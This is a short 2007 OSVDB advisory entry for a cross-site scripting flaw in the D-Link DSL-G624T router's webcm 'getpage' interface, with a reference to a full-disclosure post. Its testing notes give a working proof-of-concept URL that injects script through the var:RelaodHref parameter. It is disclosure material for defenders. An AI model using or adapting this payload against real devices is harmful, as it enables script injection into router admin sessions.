D-Link DSL-G624T webcm getpage Variable XSS

2007-05-02T02:48:01
ID OSVDB:36159
Type osvdb
Reporter OSVDB
Modified 2007-05-02T02:48:01

Description

Manual Testing Notes

http://192.168.1.1/cgi-bin/webcm?getpage=../html/home/home_RelaodHref.htm&var:RelaodHref=a"%20==%20"a"){alert("XSS")}}</script>

References:

Mail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2007-05/0056.html